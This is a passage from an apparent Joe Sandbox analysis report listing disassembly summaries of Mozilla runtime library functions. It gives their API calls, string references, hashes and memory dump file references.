                                                                  • API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3843575911-2178588373
                                                                  • Opcode ID: ad01edf4a99e5b64951740aa185caf9f8f944394e63eb50f3ab3c328d95c5d36
                                                                  • Instruction ID: e6b210a1ee016f5034c67c5d14fbbdedbc361e12fee03b4bc2170337e506caac
                                                                  • Opcode Fuzzy Hash: ad01edf4a99e5b64951740aa185caf9f8f944394e63eb50f3ab3c328d95c5d36
                                                                  • Instruction Fuzzy Hash: 3541CB756043058FCB14DFA4C488BAABBF5FF89314F10492EE99287B41EB70B949CB91
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A0039
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0A0041
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A0075
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0A0082
                                                                  • moz_xmalloc.MOZGLUE(00000048), ref: 6C0A0090
                                                                  • free.MOZGLUE(?), ref: 6C0A0104
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0A011B
                                                                  Strings
                                                                  • 3JT/, xrefs: 6C0A0012
                                                                  • [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C0A005B
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
                                                                  • String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)$3JT/
                                                                  • API String ID: 3012294017-473585492
                                                                  • Opcode ID: dc5c1849be61d87a5b3889fc64e133eef7b407a8c8ef09480759daf5840b3077
                                                                  • Instruction ID: bcfb04f0db55dc3e6ebaca79244760a4f3f8a5437730c409c89eea601c05a11e
                                                                  • Opcode Fuzzy Hash: dc5c1849be61d87a5b3889fc64e133eef7b407a8c8ef09480759daf5840b3077
                                                                  • Instruction Fuzzy Hash: F14179B56002489FCB10CFA5C840B9ABBF5FF49618F44891AED5A83B41DB31F815CBA2
                                                                  APIs
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C067EA7
                                                                  • malloc.MOZGLUE(00000001), ref: 6C067EB3
                                                                    • Part of subcall function 6C06CAB0: EnterCriticalSection.KERNEL32(?), ref: 6C06CB49
                                                                    • Part of subcall function 6C06CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C06CBB6
                                                                  • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C067EC4
                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C067F19
                                                                  • malloc.MOZGLUE(?), ref: 6C067F36
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C067F4D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
                                                                  • String ID: d$3JT/
                                                                  • API String ID: 204725295-2248993025
                                                                  • Opcode ID: 8958df128ccd6c337415c2f8dbbf83584f67538fc3bfddac63fd85997bd9f66f
                                                                  • Instruction ID: 0de97a99c89443748891ad31ac5fe8c3762d639104d3c9681654ada2933bc8d6
                                                                  • Opcode Fuzzy Hash: 8958df128ccd6c337415c2f8dbbf83584f67538fc3bfddac63fd85997bd9f66f
                                                                  • Instruction Fuzzy Hash: 9B31E761E0438897DF009F69DC04AFEB7B8EF96208F059628ED4957612FB30B6C8C390
                                                                  APIs
                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C0CB5B9
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C0CB5C5
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C0CB5DA
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C0CB5F4
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0CB605
                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C0CB61F
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C0CB631
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CB655
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1276798925-2178588373
                                                                  • Opcode ID: 011c58cab0238d105acfd956d67dd6493d0af5ebcb9d9588214dc1ed655dae5d
                                                                  • Instruction ID: 25eb08989e645915a48f11a9483da630c23e0aa73321a66148baf93da6a0b3f0
                                                                  • Opcode Fuzzy Hash: 011c58cab0238d105acfd956d67dd6493d0af5ebcb9d9588214dc1ed655dae5d
                                                                  • Instruction Fuzzy Hash: 76318F71B002048BCF00DFA9C858AAEB7FAEB8A724B154519DD1697780DF35B906CF92
                                                                  APIs
                                                                  • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C05BC03
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C05BD06
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                  • String ID: 0$0$y$3JT/
                                                                  • API String ID: 2811501404-1080883989
                                                                  • Opcode ID: c0216f0e77c269ab708899a965cd228a8e73c716c2cabf749992d4bd9f20b0a7
                                                                  • Instruction ID: f062267a28d20ab56be52e8a5e456da02bee10c64b9055d29d124197be152671
                                                                  • Opcode Fuzzy Hash: c0216f0e77c269ab708899a965cd228a8e73c716c2cabf749992d4bd9f20b0a7
                                                                  • Instruction Fuzzy Hash: 5C61B171A087458FC710CF28C581B5FBBE9EF89348F804A2DF88597651DB70E959CB92
                                                                  APIs
                                                                    • Part of subcall function 6C05F100: LoadLibraryW.KERNEL32(shell32,?,6C0CD020), ref: 6C05F122
                                                                    • Part of subcall function 6C05F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C05F132
                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C05ED50
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C05EDAC
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C05EDCC
                                                                  • CreateFileW.KERNEL32 ref: 6C05EE08
                                                                  • free.MOZGLUE(00000000), ref: 6C05EE27
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C05EE32
                                                                    • Part of subcall function 6C05EB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C05EBB5
                                                                    • Part of subcall function 6C05EB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C08D7F3), ref: 6C05EBC3
                                                                    • Part of subcall function 6C05EB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C08D7F3), ref: 6C05EBD6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-$3JT/
                                                                  • API String ID: 1980384892-365047678
                                                                  • Opcode ID: e4b8bf804cecf2636836e1b7dba58e12a7aea1a409376c0aa88243942bbb2156
                                                                  • Instruction ID: 25db11c9575e71db89aa51ca8b840e7b93278766ca9dd2b7be51de54c01a785c
                                                                  • Opcode Fuzzy Hash: e4b8bf804cecf2636836e1b7dba58e12a7aea1a409376c0aa88243942bbb2156
                                                                  • Instruction Fuzzy Hash: 9751C471E053048BDB00DF68C9447EEB7F1AF59318F84852DD8A567780EB347958C7A2
                                                                  APIs
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0CA565
                                                                    • Part of subcall function 6C0CA470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0CA4BE
                                                                    • Part of subcall function 6C0CA470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C0CA4D6
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0CA65B
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0CA6B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                  • String ID: 0$z$3JT/
                                                                  • API String ID: 310210123-22822166
                                                                  • Opcode ID: 949f13a33b20dd146b927be5e11b0d7262b321d4f8fd9e6ea83b27eb0eeb0bf5
                                                                  • Instruction ID: a085dce0588e9dd0d8601f46dc88524a5946470489bccd5ef649f6d1d123e7a4
                                                                  • Opcode Fuzzy Hash: 949f13a33b20dd146b927be5e11b0d7262b321d4f8fd9e6ea83b27eb0eeb0bf5
                                                                  • Instruction Fuzzy Hash: 19412871A097459FC741DF28C480A8FBBE5BF89354F508A2EF49987650EB30E549CB93
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A1D0F
                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,6C0A1BE3,?,?,6C0A1D96,00000000), ref: 6C0A1D18
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,6C0A1BE3,?,?,6C0A1D96,00000000), ref: 6C0A1D4C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0A1DB7
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0A1DC0
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0A1DDA
                                                                    • Part of subcall function 6C0A1EF0: GetCurrentThreadId.KERNEL32 ref: 6C0A1F03
                                                                    • Part of subcall function 6C0A1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C0A1DF2,00000000,00000000), ref: 6C0A1F0C
                                                                    • Part of subcall function 6C0A1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C0A1F20
                                                                  • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C0A1DF4
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1880959753-2178588373
                                                                  • Opcode ID: 665b11acb352388fc8c425a9623f46f0baedd7153237cdfde6b60e8f7341ae81
                                                                  • Instruction ID: 73fc239e6d92a09a0a7df5af431cb6f800ac4676a79221c70bff55a7c962e572
                                                                  • Opcode Fuzzy Hash: 665b11acb352388fc8c425a9623f46f0baedd7153237cdfde6b60e8f7341ae81
                                                                  • Instruction Fuzzy Hash: 374124B52007059FCB10DF69C488B56BBF9FF89718F10442AE95A87B42DB71F854CB91
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DE220,?), ref: 6C0BBC2D
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DE220), ref: 6C0BBC42
                                                                  • RtlFreeHeap.NTDLL(?,00000000,6C0CE300), ref: 6C0BBC82
                                                                  • RtlFreeUnicodeString.NTDLL(6C0DE210), ref: 6C0BBC91
                                                                  • RtlFreeUnicodeString.NTDLL(6C0DE208), ref: 6C0BBCA3
                                                                  • RtlFreeHeap.NTDLL(?,00000000,6C0DE21C), ref: 6C0BBCD2
                                                                  • free.MOZGLUE(?), ref: 6C0BBCD8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                  • String ID: ,l
                                                                  • API String ID: 3047341122-303387729
                                                                  • Opcode ID: d87534b2de913f7324b85f79d9695c70dab536404555c1afca079ca7620f4886
                                                                  • Instruction ID: 1f20e8ab9d269ef054122c53fb60747b5a83e8513e2aab5766eed9bcc035bbf3
                                                                  • Opcode Fuzzy Hash: d87534b2de913f7324b85f79d9695c70dab536404555c1afca079ca7620f4886
                                                                  • Instruction Fuzzy Hash: BD21CE726003048FE720DF06C8C0BAAB7E8FF45718F158469E95A6BA10CB72F845CBE1
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C061699
                                                                  • VerSetConditionMask.NTDLL ref: 6C0616CB
                                                                  • VerSetConditionMask.NTDLL ref: 6C0616D7
                                                                  • VerSetConditionMask.NTDLL ref: 6C0616DE
                                                                  • VerSetConditionMask.NTDLL ref: 6C0616E5
                                                                  • VerSetConditionMask.NTDLL ref: 6C0616EC
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0616F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                  • String ID: 3JT/
                                                                  • API String ID: 375572348-2178588373
                                                                  • Opcode ID: 540245c8e2e90c08b8c5bcf326629f0f926112a91506216717f528fe3bd3a893
                                                                  • Instruction ID: 958e490b3425b76bfc579e14722d7b7f695d07230b1176b2c731efdc4db2a3be
                                                                  • Opcode Fuzzy Hash: 540245c8e2e90c08b8c5bcf326629f0f926112a91506216717f528fe3bd3a893
                                                                  • Instruction Fuzzy Hash: 0821A2B07403086BEB116A65CC85FBBB3BCEF86704F454528F6459B6C0DA74AE54C6A1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD1EC
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD1F5
                                                                    • Part of subcall function 6C0AAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C0AAE20
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD211
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0AD217
                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C0AD226
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C0AD279
                                                                  • free.MOZGLUE(?), ref: 6C0AD2B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3049780610-2178588373
                                                                  • Opcode ID: cf4cc44399b77d28380140fc7f9126f0713bcef64c5d52398b334e6ded72e535
                                                                  • Instruction ID: fdcbd7c4a4a7a16d7267a789f320aa9e07a6cf4a6d66469c1f89299d4dec0aa5
                                                                  • Opcode Fuzzy Hash: cf4cc44399b77d28380140fc7f9126f0713bcef64c5d52398b334e6ded72e535
                                                                  • Instruction Fuzzy Hash: 4E214D756043059BCB04DFA5C488A9EB7F5FF8A324F10452DE95A87741DB30B90ACB96
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL ref: 6C063EEE
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C063FDC
                                                                  • RtlAllocateHeap.NTDLL ref: 6C064006
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0640A1
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C063CCC), ref: 6C0640AF
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C063CCC), ref: 6C0640C2
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C064134
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C063CCC), ref: 6C064143
                                                                  • RtlFreeUnicodeString.NTDLL(?,?,?,00000000,?,?,00000000,00000040,?,?,?,?,?,6C063CCC), ref: 6C064157
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Free$Heap$StringUnicode$Allocate
                                                                  • String ID:
                                                                  • API String ID: 3680524765-0
                                                                  • Opcode ID: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction ID: eb9f18178d45c8a25befe3fbc73e10439e87cf4b6f4b9173bb0355d5a157c267
                                                                  • Opcode Fuzzy Hash: b13ab191b94d3bc336a0173e00329c51f753acdad4a2e35824d3aa2c58c5bb22
                                                                  • Instruction Fuzzy Hash: 7FA180B1A00215DFEB40CF6AC88075AB7F5FF49308F254599D909AFB52D771E886CBA0
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(00000000,?,6C073F47,?,?,?,6C073F47,6C071A70,?), ref: 6C05207F
                                                                  • memset.VCRUNTIME140(?,000000E5,6C073F47,?,6C073F47,6C071A70,?), ref: 6C0520DD
                                                                  • VirtualFree.KERNEL32(00100000,00100000,00004000,?,6C073F47,6C071A70,?), ref: 6C05211A
                                                                  • EnterCriticalSection.KERNEL32(6C0DE744,?,6C073F47,6C071A70,?), ref: 6C052145
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6C073F47,6C071A70,?), ref: 6C0521BA
                                                                  • EnterCriticalSection.KERNEL32(6C0DE744,?,6C073F47,6C071A70,?), ref: 6C0521E0
                                                                  • LeaveCriticalSection.KERNEL32(6C0DE744,?,6C073F47,6C071A70,?), ref: 6C052232
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
                                                                  • API String ID: 889484744-884734703
                                                                  • Opcode ID: 726a95cb121c3e4fcc2278b9f427302ca9179720ed76f163bf57789225f70dce
                                                                  • Instruction ID: 73bca320577905d32ea9e0ebb6fdfe12fcbe808ff67a608e3c5f645d751ef97f
                                                                  • Opcode Fuzzy Hash: 726a95cb121c3e4fcc2278b9f427302ca9179720ed76f163bf57789225f70dce
                                                                  • Instruction Fuzzy Hash: E061E931F012168FCB04CE68CA8976E77F5EF95714F994139EA24A7B94DB70AD10CB81
                                                                  APIs
                                                                  • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C0ADDCF
                                                                    • Part of subcall function 6C08FA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C08FA4B
                                                                    • Part of subcall function 6C0A90E0: free.MOZGLUE(?,00000000,?,?,6C0ADEDB), ref: 6C0A90FF
                                                                    • Part of subcall function 6C0A90E0: free.MOZGLUE(?,00000000,?,?,6C0ADEDB), ref: 6C0A9108
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ADE0D
                                                                  • free.MOZGLUE(00000000), ref: 6C0ADE41
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ADE5F
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ADEA3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ADEE9
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C09DEFD,?,6C064A68), ref: 6C0ADF32
                                                                    • Part of subcall function 6C0ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0ADB86
                                                                    • Part of subcall function 6C0ADAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C0ADC0E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C09DEFD,?,6C064A68), ref: 6C0ADF65
                                                                  • free.MOZGLUE(?), ref: 6C0ADF80
